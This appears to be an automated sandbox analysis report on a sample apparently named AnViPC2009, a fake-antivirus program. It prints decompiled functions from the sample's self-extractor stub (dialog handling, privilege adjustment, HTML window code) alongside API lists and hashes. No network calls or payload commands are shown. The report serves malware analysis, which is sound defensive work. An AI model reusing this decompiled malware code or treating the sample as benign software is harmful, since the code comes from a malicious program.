                                                                                                                                                      0x0040aed0
                                                                                                                                                      0x0040aebf
                                                                                                                                                      0x0040aec0
                                                                                                                                                      0x0040aecc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040aecc
                                                                                                                                                      0x0040aec3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,00000171,00000000,00000000), ref: 0040AEEA
                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 0040AEF5
                                                                                                                                                      • EndDialog.USER32(?,00000005), ref: 0040AEFD
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040AF45
                                                                                                                                                      • SHGetFileInfoA.SHELL32(?,00000000,?,00000160,00000100), ref: 0040AF60
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,00000170,?,00000000), ref: 0040AF77
                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0040AF8B
                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0040AFA8
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040AFB6
                                                                                                                                                      • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040AFCA
                                                                                                                                                      • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040AFDD
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B008
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B019
                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0040B01E
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B05B
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B06C
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000067,00000170,?,00000000), ref: 0040B080
                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0040B09A
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040B0A8
                                                                                                                                                      • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0040B0BD
                                                                                                                                                      • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0040B0D2
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B0F7
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B108
                                                                                                                                                      • wsprintfA.USER32 ref: 0040B14C
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B15D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$Item$File$Text$Formatwsprintf$DateMessageSend$FindSystem$CloseDestroyDialogFirstIconInfoLocal
                                                                                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 1296638866-1840816070
                                                                                                                                                      • Opcode ID: 79b052446e981f1dd4b57b2920a81b4df2162506f9d5938393f6bee3e9fc9c82
                                                                                                                                                      • Instruction ID: d71b630460a022489d13e93f2085247ecd22acf21596276d32a384347c690557
                                                                                                                                                      • Opcode Fuzzy Hash: 79b052446e981f1dd4b57b2920a81b4df2162506f9d5938393f6bee3e9fc9c82
                                                                                                                                                      • Instruction Fuzzy Hash: 55914C7258020DBBEB21DFA0CD85FEB37ACEB08740F044472BB05E50D1D6B89A65CB69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040346B() {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                      				int _t11;
                                                                                                                                                      				char _t31;
                                                                                                                                                      
                                                                                                                                                      				_t31 =  *0x41486e; // 0x0
                                                                                                                                                      				if(_t31 == 0) {
                                                                                                                                                      					 *0x41486e = 1;
                                                                                                                                                      					_t11 = OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
                                                                                                                                                      					if(_t11 != 0) {
                                                                                                                                                      						_v24.PrivilegeCount = 1;
                                                                                                                                                      						_v12 = 2;
                                                                                                                                                      						if(LookupPrivilegeValueA(0, "SeSecurityPrivilege",  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
                                                                                                                                                      							 *0x41486d = 1;
                                                                                                                                                      						}
                                                                                                                                                      						if(LookupPrivilegeValueA(0, "SeRestorePrivilege",  &(_v24.Privileges)) != 0) {
                                                                                                                                                      							AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                                                                      						}
                                                                                                                                                      						return CloseHandle(_v8);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t11;
                                                                                                                                                      			}








                                                                                                                                                      0x00403474
                                                                                                                                                      0x0040347a
                                                                                                                                                      0x00403486
                                                                                                                                                      0x00403494
                                                                                                                                                      0x0040349c
                                                                                                                                                      0x004034b0
                                                                                                                                                      0x004034b7
                                                                                                                                                      0x004034c8
                                                                                                                                                      0x004034e5
                                                                                                                                                      0x004034e5
                                                                                                                                                      0x004034fa
                                                                                                                                                      0x00403507
                                                                                                                                                      0x00403507
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403513
                                                                                                                                                      0x0040349c
                                                                                                                                                      0x00403516

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?,00000000,0040377E,?,00000000,?,?), ref: 0040348D
                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403494
                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32 ref: 004034BE
                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 004034D5
                                                                                                                                                      • GetLastError.KERNEL32 ref: 004034DB
                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 004034F6
                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403507
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040350C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Token$AdjustLookupPrivilegePrivilegesProcessValue$CloseCurrentErrorHandleLastOpen
                                                                                                                                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                      • API String ID: 2567606174-639343689
                                                                                                                                                      • Opcode ID: 64bcb0090e4d4d25212edab5216b569426b768200398b1041a14e0e93c7aa550
                                                                                                                                                      • Instruction ID: 7d81605929c947d6144b9ea4fa9dff10e940ff5578ad20a6b2f73eacfddd6434
                                                                                                                                                      • Opcode Fuzzy Hash: 64bcb0090e4d4d25212edab5216b569426b768200398b1041a14e0e93c7aa550
                                                                                                                                                      • Instruction Fuzzy Hash: 99115BB1500209BEEB11EBA59E84EFB7FACEB44348F144036E500E2191D7B59E04CB78
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                      			E00406D16(void* __ecx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				struct tagPOINT _v20;
                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                      				long _t41;
                                                                                                                                                      				struct HWND__* _t43;
                                                                                                                                                      				struct HWND__* _t44;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				CHAR* _t75;
                                                                                                                                                      
                                                                                                                                                      				_t74 = __ecx;
                                                                                                                                                      				if( *((char*)(__ecx + 0x14)) == 0) {
                                                                                                                                                      					__imp__OleInitialize(0);
                                                                                                                                                      					__imp__#17();
                                                                                                                                                      					 *((char*)(__ecx + 0x14)) = 1;
                                                                                                                                                      				}
                                                                                                                                                      				 *((char*)(_t74 + 0x15)) = 0;
                                                                                                                                                      				ShowWindow(_a8, 0);
                                                                                                                                                      				E00406CAF(_t74, _a4);
                                                                                                                                                      				 *((intOrPtr*)(_t74 + 0x10)) = _a12;
                                                                                                                                                      				GetWindowRect(_a8,  &_v20);
                                                                                                                                                      				MapWindowPoints(0, GetParent(_a8),  &_v20, 2);
                                                                                                                                                      				_t37 =  *(_t74 + 4);
                                                                                                                                                      				if(_t37 != 0) {
                                                                                                                                                      					DestroyWindow(_t37);
                                                                                                                                                      				}
                                                                                                                                                      				_t38 = GetParent(_a8);
                                                                                                                                                      				_t41 = _v20.x;
                                                                                                                                                      				_t67 = _v12 - _t41;
                                                                                                                                                      				_t43 = CreateWindowExA(0, "RarHtmlClassName", 0, 0x40000000, _t41 + 1, _v20.y, _v12 - _t41, _v8 - _v20.y, _t38, 0,  *_t74, _t74);
                                                                                                                                                      				 *(_t74 + 4) = _t43;
                                                                                                                                                      				if(_t43 != 0) {
                                                                                                                                                      					ShowWindow(_t43, 5);
                                                                                                                                                      					_t43 = UpdateWindow( *(_t74 + 4));
                                                                                                                                                      				}
                                                                                                                                                      				if( *((char*)(_t74 + 0x15)) == 0) {
                                                                                                                                                      					_t44 =  *(_t74 + 4);
                                                                                                                                                      					if(_t44 != 0) {
                                                                                                                                                      						DestroyWindow(_t44);
                                                                                                                                                      						 *(_t74 + 4) = 0;
                                                                                                                                                      					}
                                                                                                                                                      					ShowWindow(_a8, 5);
                                                                                                                                                      					_t61 = E0040A1C5(0x100 + E0040A35D(_t67, _a12) * 6);
                                                                                                                                                      					E0040A450(_t49, _a12);
                                                                                                                                                      					if(E0040657B(_t61) == 0) {
                                                                                                                                                      						E004065AB(_t74, _t61);
                                                                                                                                                      					}
                                                                                                                                                      					_t75 = E004069DB(_t74, _t61);
                                                                                                                                                      					_t43 = E0040A1DE(_t61);
                                                                                                                                                      					if(_t75 != 0) {
                                                                                                                                                      						SetWindowTextA(_a8, _t75);
                                                                                                                                                      						return E0040A1DE(_t75);
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					if( *((intOrPtr*)(_t74 + 0x18)) > 0x64) {
                                                                                                                                                      						return E00406675(_t74);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t43;
                                                                                                                                                      			}













                                                                                                                                                      0x00406d1e
                                                                                                                                                      0x00406d25
                                                                                                                                                      0x00406d29
                                                                                                                                                      0x00406d2f
                                                                                                                                                      0x00406d35
                                                                                                                                                      0x00406d35
                                                                                                                                                      0x00406d44
                                                                                                                                                      0x00406d48
                                                                                                                                                      0x00406d4f
                                                                                                                                                      0x00406d57
                                                                                                                                                      0x00406d61
                                                                                                                                                      0x00406d7b
                                                                                                                                                      0x00406d81
                                                                                                                                                      0x00406d86
                                                                                                                                                      0x00406d89
                                                                                                                                                      0x00406d89
                                                                                                                                                      0x00406d97
                                                                                                                                                      0x00406da6
                                                                                                                                                      0x00406dac
                                                                                                                                                      0x00406dbf
                                                                                                                                                      0x00406dc5
                                                                                                                                                      0x00406dca
                                                                                                                                                      0x00406dcf
                                                                                                                                                      0x00406dd4
                                                                                                                                                      0x00406dd4
                                                                                                                                                      0x00406dde
                                                                                                                                                      0x00406def
                                                                                                                                                      0x00406df4
                                                                                                                                                      0x00406df7
                                                                                                                                                      0x00406dfd
                                                                                                                                                      0x00406dfd
                                                                                                                                                      0x00406e05
                                                                                                                                                      0x00406e20
                                                                                                                                                      0x00406e23
                                                                                                                                                      0x00406e32
                                                                                                                                                      0x00406e37
                                                                                                                                                      0x00406e37
                                                                                                                                                      0x00406e45
                                                                                                                                                      0x00406e47
                                                                                                                                                      0x00406e4e
                                                                                                                                                      0x00406e54
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406e5b
                                                                                                                                                      0x00406de0
                                                                                                                                                      0x00406de4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406de8
                                                                                                                                                      0x00406de4
                                                                                                                                                      0x00406e64

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Show$DestroyParent$CreateInitializePointsRectTextUpdate
                                                                                                                                                      • String ID: RarHtmlClassName
                                                                                                                                                      • API String ID: 2853670363-1658105358
                                                                                                                                                      • Opcode ID: 3dbca66da2985958ccf1f80327613cf57dd49c96dfce50384e4efeab75712d82
                                                                                                                                                      • Instruction ID: 7d84189fce597607ec0bec32f7f4075a13aa85f1f893a8996aed6042c7edaf9c
                                                                                                                                                      • Opcode Fuzzy Hash: 3dbca66da2985958ccf1f80327613cf57dd49c96dfce50384e4efeab75712d82
                                                                                                                                                      • Instruction Fuzzy Hash: 2541F670600314BFDB21AF74DD49FAF7BB9EF44704F01852AF816E2291CB7899208B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040ABB5(void* _a4, signed int _a8, int _a12) {
                                                                                                                                                      				struct HDC__* _v8;
                                                                                                                                                      				struct HDC__* _v12;
                                                                                                                                                      				struct HBITMAP__* _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				signed int _v36;
                                                                                                                                                      				signed int _v40;
                                                                                                                                                      				void _v44;
                                                                                                                                                      				struct HDC__* _t36;
                                                                                                                                                      				signed int _t43;
                                                                                                                                                      				struct HDC__* _t54;
                                                                                                                                                      
                                                                                                                                                      				_t36 = GetDC(0);
                                                                                                                                                      				_v12 = _t36;
                                                                                                                                                      				_t54 = CreateCompatibleDC(_t36);
                                                                                                                                                      				_v8 = CreateCompatibleDC(_v12);
                                                                                                                                                      				GetObjectA(_a4, 0x18,  &_v44);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_t43 = _v36 * _a8 / _v40;
                                                                                                                                                      				if(_t43 < _a12) {
                                                                                                                                                      					_a12 = _t43;
                                                                                                                                                      				}
                                                                                                                                                      				_v16 = CreateCompatibleBitmap(_v12, _a8, _a12);
                                                                                                                                                      				_a4 = SelectObject(_t54, _a4);
                                                                                                                                                      				_v20 = SelectObject(_v8, _v16);
                                                                                                                                                      				StretchBlt(_v8, 0, 0, _a8, _a12, _t54, 0, 0, _v40, _v36, 0xcc0020);
                                                                                                                                                      				SelectObject(_t54, _a4);
                                                                                                                                                      				SelectObject(_v8, _v20);
                                                                                                                                                      				DeleteDC(_t54);
                                                                                                                                                      				DeleteDC(_v8);
                                                                                                                                                      				ReleaseDC(0, _v12);
                                                                                                                                                      				return _v16;
                                                                                                                                                      			}













                                                                                                                                                      0x0040abc1
                                                                                                                                                      0x0040abce
                                                                                                                                                      0x0040abd6
                                                                                                                                                      0x0040abda
                                                                                                                                                      0x0040abe6
                                                                                                                                                      0x0040abf3
                                                                                                                                                      0x0040abf4
                                                                                                                                                      0x0040abfa
                                                                                                                                                      0x0040abfc
                                                                                                                                                      0x0040abfc
                                                                                                                                                      0x0040ac18
                                                                                                                                                      0x0040ac20
                                                                                                                                                      0x0040ac30
                                                                                                                                                      0x0040ac44
                                                                                                                                                      0x0040ac4e
                                                                                                                                                      0x0040ac56
                                                                                                                                                      0x0040ac5f
                                                                                                                                                      0x0040ac64
                                                                                                                                                      0x0040ac6a
                                                                                                                                                      0x0040ac77

                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 0040ABC1
                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0040ABD1
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0040ABD8
                                                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0040ABE6
                                                                                                                                                      • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 0040AC08
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040AC1B
                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0040AC26
                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040AC44
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040AC4E
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0040AC56
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0040AC5F
                                                                                                                                                      • DeleteDC.GDI32(?), ref: 0040AC64
                                                                                                                                                      • ReleaseDC.USER32 ref: 0040AC6A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3950507155-0
                                                                                                                                                      • Opcode ID: 56819850a12cc89720f04a66fc2689964519d0f5c48e7ddfd1700f3f5e00804d
                                                                                                                                                      • Instruction ID: ed0939bf5158b79f47af51a0cf9f034759c115d665509f7dc4984fb6e39a0ab4
                                                                                                                                                      • Opcode Fuzzy Hash: 56819850a12cc89720f04a66fc2689964519d0f5c48e7ddfd1700f3f5e00804d
                                                                                                                                                      • Instruction Fuzzy Hash: B921A476800258FFCF119FA5CD48CDEBFBAFB49350B108466FA14A2120C7759A60EFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00406822(intOrPtr __ecx) {
                                                                                                                                                      				char* _t48;
                                                                                                                                                      				short* _t55;
                                                                                                                                                      				signed int _t56;
                                                                                                                                                      				char _t58;
                                                                                                                                                      				short* _t59;
                                                                                                                                                      				char _t62;
                                                                                                                                                      				short* _t64;
                                                                                                                                                      				int _t65;
                                                                                                                                                      				intOrPtr _t83;
                                                                                                                                                      				void* _t86;
                                                                                                                                                      				char* _t87;
                                                                                                                                                      				int _t94;
                                                                                                                                                      				intOrPtr _t95;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      
                                                                                                                                                      				_t96 = _t98 - 0x74;
                                                                                                                                                      				_t48 =  *(__ecx + 0xc);
                                                                                                                                                      				 *((intOrPtr*)(_t96 + 0x60)) = __ecx;
                                                                                                                                                      				if(_t48 == 0) {
                                                                                                                                                      					L27:
                                                                                                                                                      					return _t48;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t96 + 0x64) = 0;
                                                                                                                                                      				 *((intOrPtr*)( *_t48 + 0x2c))(_t48, L"about:blank", 0, 0, 0, 0, _t86);
                                                                                                                                                      				_t83 = __ecx;
                                                                                                                                                      				 *((char*)(_t96 + 0x6b)) = E0040657B( *(_t96 + 0x7c));
                                                                                                                                                      				_t94 = 0x100 + lstrlenA( *(_t96 + 0x7c)) * 6;
                                                                                                                                                      				_t48 = GlobalAlloc(0x40, _t94);
                                                                                                                                                      				_t87 = _t48;
                                                                                                                                                      				if(_t87 == 0) {
                                                                                                                                                      					L26:
                                                                                                                                                      					goto L27;
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t96 - 0x38) = 0x94;
                                                                                                                                                      				GetVersionExA(_t96 - 0x38);
                                                                                                                                                      				if( *((intOrPtr*)(_t96 - 0x28)) != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					 *((char*)(_t96 + 0x73)) = 1;
                                                                                                                                                      					L5:
                                                                                                                                                      					E0040A450(_t87, "<html>");
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                      						E0040A5BB(_t87, "<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                                                                                                      						 *((intOrPtr*)(_t96 + 0x5c)) = E0040A35D(_t83, _t87) + _t87;
                                                                                                                                                      						E0040A5BB(_t87, "utf-8\"></head>");
                                                                                                                                                      					}
                                                                                                                                                      					_t55 =  *(_t96 + 0x7c);
                                                                                                                                                      					 *(_t96 + 0x6c) = _t55;
                                                                                                                                                      					L9:
                                                                                                                                                      					if( *_t55 == 0x20) {
                                                                                                                                                      						 *(_t96 + 0x6c) =  &(( *(_t96 + 0x6c))[0]);
                                                                                                                                                      						_t55 =  *(_t96 + 0x6c);
                                                                                                                                                      						goto L9;
                                                                                                                                                      					}
                                                                                                                                                      					_t56 = E0040A596( *(_t96 + 0x6c), "<html>", 6);
                                                                                                                                                      					asm("sbb al, al");
                                                                                                                                                      					_t58 =  ~_t56 + 1;
                                                                                                                                                      					 *((char*)(_t96 + 0x6a)) = _t58;
                                                                                                                                                      					if(_t58 == 0) {
                                                                                                                                                      						_t59 =  *(_t96 + 0x7c);
                                                                                                                                                      					} else {
                                                                                                                                                      						_t59 =  &(( *(_t96 + 0x6c))[3]);
                                                                                                                                                      					}
                                                                                                                                                      					E0040A5BB(_t87, _t59);
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x6a)) == 0) {
                                                                                                                                                      						E0040A5BB(_t87, "</html>");
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x6b)) == 0) {
                                                                                                                                                      						E004065AB( *((intOrPtr*)(_t96 + 0x60)), _t87);
                                                                                                                                                      					}
                                                                                                                                                      					if( *((intOrPtr*)(_t96 + 0x73)) != 0) {
                                                                                                                                                      						_t64 = E0040A1C5(_t94 + _t94);
                                                                                                                                                      						 *(_t96 + 0x6c) = _t64;
                                                                                                                                                      						if(_t64 != 0) {
                                                                                                                                                      							_t65 = MultiByteToWideChar(0, 0, _t87, 0xffffffff, _t64, _t94);
                                                                                                                                                      							_t32 =  &(_t87[3]); // 0x3
                                                                                                                                                      							 *((char*)(_t96 + 0x7f)) = _t65 != 0;
                                                                                                                                                      							if(WideCharToMultiByte(0xfde9, 0,  *(_t96 + 0x6c), 0xffffffff, _t32, _t94, 0, 0) == 0) {
                                                                                                                                                      								 *((char*)(_t96 + 0x7f)) = 0;
                                                                                                                                                      							}
                                                                                                                                                      							E0040A1DE( *(_t96 + 0x6c));
                                                                                                                                                      							if( *((intOrPtr*)(_t96 + 0x7f)) == 0) {
                                                                                                                                                      								 *((char*)( *((intOrPtr*)(_t96 + 0x5c)))) = 0x5f;
                                                                                                                                                      							} else {
                                                                                                                                                      								 *_t87 = 0xef;
                                                                                                                                                      								_t87[1] = 0xbb;
                                                                                                                                                      								_t87[2] = 0xbf;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t48 = _t96 + 0x64;
                                                                                                                                                      					__imp__CreateStreamOnHGlobal(_t87, 1, _t48);
                                                                                                                                                      					if(_t48 >= 0) {
                                                                                                                                                      						_t95 =  *((intOrPtr*)(_t96 + 0x60));
                                                                                                                                                      						 *((char*)(_t95 + 0x15)) = E004064BF( *((intOrPtr*)(_t95 + 0xc)),  *(_t96 + 0x64));
                                                                                                                                                      						_t62 =  *(_t96 + 0x64);
                                                                                                                                                      						_t48 =  *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                                                                                      					}
                                                                                                                                                      					goto L26;
                                                                                                                                                      				}
                                                                                                                                                      				 *((char*)(_t96 + 0x73)) = 0;
                                                                                                                                                      				if(( *(_t96 - 0x2c) & 0x0000ffff) < 0x7ce) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}


















                                                                                                                                                      0x00406823
                                                                                                                                                      0x00406831
                                                                                                                                                      0x00406836
                                                                                                                                                      0x0040683b
                                                                                                                                                      0x004069d2
                                                                                                                                                      0x004069d8
                                                                                                                                                      0x004069d8
                                                                                                                                                      0x0040684b
                                                                                                                                                      0x00406851
                                                                                                                                                      0x00406857
                                                                                                                                                      0x00406861
                                                                                                                                                      0x0040686f
                                                                                                                                                      0x00406878
                                                                                                                                                      0x0040687e
                                                                                                                                                      0x00406882
                                                                                                                                                      0x004069d1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004069d1
                                                                                                                                                      0x0040688c
                                                                                                                                                      0x00406893
                                                                                                                                                      0x0040689d
                                                                                                                                                      0x004068ad
                                                                                                                                                      0x004068ad
                                                                                                                                                      0x004068b1
                                                                                                                                                      0x004068b7
                                                                                                                                                      0x004068bf
                                                                                                                                                      0x004068c7
                                                                                                                                                      0x004068da
                                                                                                                                                      0x004068dd
                                                                                                                                                      0x004068dd
                                                                                                                                                      0x004068e2
                                                                                                                                                      0x004068e5
                                                                                                                                                      0x004068f0
                                                                                                                                                      0x004068f3
                                                                                                                                                      0x004068ea
                                                                                                                                                      0x004068ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004068ed
                                                                                                                                                      0x004068ff
                                                                                                                                                      0x00406906
                                                                                                                                                      0x00406908
                                                                                                                                                      0x0040690a
                                                                                                                                                      0x0040690d
                                                                                                                                                      0x00406917
                                                                                                                                                      0x0040690f
                                                                                                                                                      0x00406912
                                                                                                                                                      0x00406912
                                                                                                                                                      0x0040691c
                                                                                                                                                      0x00406924
                                                                                                                                                      0x0040692c
                                                                                                                                                      0x0040692c
                                                                                                                                                      0x00406934
                                                                                                                                                      0x0040693a
                                                                                                                                                      0x0040693a
                                                                                                                                                      0x00406942
                                                                                                                                                      0x00406948
                                                                                                                                                      0x0040694d
                                                                                                                                                      0x00406952
                                                                                                                                                      0x0040695b
                                                                                                                                                      0x00406966
                                                                                                                                                      0x0040696f
                                                                                                                                                      0x00406981
                                                                                                                                                      0x00406983
                                                                                                                                                      0x00406983
                                                                                                                                                      0x00406989
                                                                                                                                                      0x00406991
                                                                                                                                                      0x004069a3
                                                                                                                                                      0x00406993
                                                                                                                                                      0x00406993
                                                                                                                                                      0x00406996
                                                                                                                                                      0x0040699a
                                                                                                                                                      0x0040699a
                                                                                                                                                      0x00406991
                                                                                                                                                      0x00406952
                                                                                                                                                      0x004069a6
                                                                                                                                                      0x004069ad
                                                                                                                                                      0x004069b5
                                                                                                                                                      0x004069ba
                                                                                                                                                      0x004069c5
                                                                                                                                                      0x004069c8
                                                                                                                                                      0x004069ce
                                                                                                                                                      0x004069ce
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004069b5
                                                                                                                                                      0x004068a3
